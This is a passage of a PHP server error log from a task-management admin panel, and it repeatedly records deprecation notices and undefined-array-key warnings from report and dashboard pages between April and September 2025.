Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [09-Apr-2025 10:52:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 10:52:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 10:52:21 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 10:52:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 10:52:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 11:14:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 11:14:19 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 13:30:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 13:31:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 13:31:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [09-Apr-2025 17:06:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Apr-2025 17:06:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Apr-2025 17:06:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 03:51:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 03:51:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 03:51:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Apr-2025 06:53:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 06:54:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 06:54:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 09:39:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:07 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [10-Apr-2025 09:41:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 09:41:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [10-Apr-2025 09:45:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 09:45:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 10:16:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 10:16:32 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 10:30:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 10:30:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 11:06:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 11:06:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 11:52:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 12:31:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:11:17 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:11:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 13:11:31 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 13:20:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 13:59:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 13:59:57 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 14:27:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 14:27:04 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:38 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:31:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:31:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 15:44:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 15:44:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 15:44:25 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 17:18:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 17:18:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 17:18:05 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:09:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 18:10:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:10:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:15:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:15:43 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:17:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:17:01 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 18:28:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 18:28:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 23:48:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Apr-2025 23:49:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [10-Apr-2025 23:49:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Apr-2025 23:50:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [10-Apr-2025 23:50:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 07:58:04 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 07:58:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 07:58:08 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 08:06:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 08:06:18 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 08:43:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 08:55:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 08:55:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 11:57:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:02:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:03:14 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:03:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 12:03:24 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 12:04:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:05:12 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:05:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 12:10:40 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 12:11:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 14:15:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 15:06:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:06:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 15:31:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:31:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:33:47 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 15:33:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 15:33:50 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [11-Apr-2025 15:34:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [11-Apr-2025 15:34:30 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 15:35:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [11-Apr-2025 15:35:27 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [11-Apr-2025 15:44:22 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 15:53:48 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:02:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:02:16 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:04:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Apr-2025 16:04:49 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:05:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [11-Apr-2025 16:05:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Apr-2025 16:05:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [26-Aug-2025 11:24:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:25:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:25:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 70 [26-Aug-2025 11:25:23 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 76 [26-Aug-2025 11:26:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [26-Aug-2025 11:34:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 12:59:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:01:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:01:29 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:02:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:02:34 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:07:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [27-Aug-2025 13:07:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [27-Aug-2025 13:09:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:19:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [27-Aug-2025 13:20:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [28-Aug-2025 13:14:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Aug-2025 14:59:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [29-Aug-2025 15:00:32 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 19 [09-Sep-2025 12:45:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [09-Sep-2025 12:45:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [09-Sep-2025 12:45:33 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [10-Sep-2025 13:25:42 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Sep-2025 13:25:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [10-Sep-2025 13:28:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Sep-2025 10:43:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [11-Sep-2025 10:43:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [11-Sep-2025 10:43:28 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 10:31:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 10:41:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 10:41:26 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 10:57:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 10:57:55 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:01:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:03:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 131 [12-Sep-2025 11:03:13 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 138 [12-Sep-2025 11:05:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:45:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [12-Sep-2025 11:46:02 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in 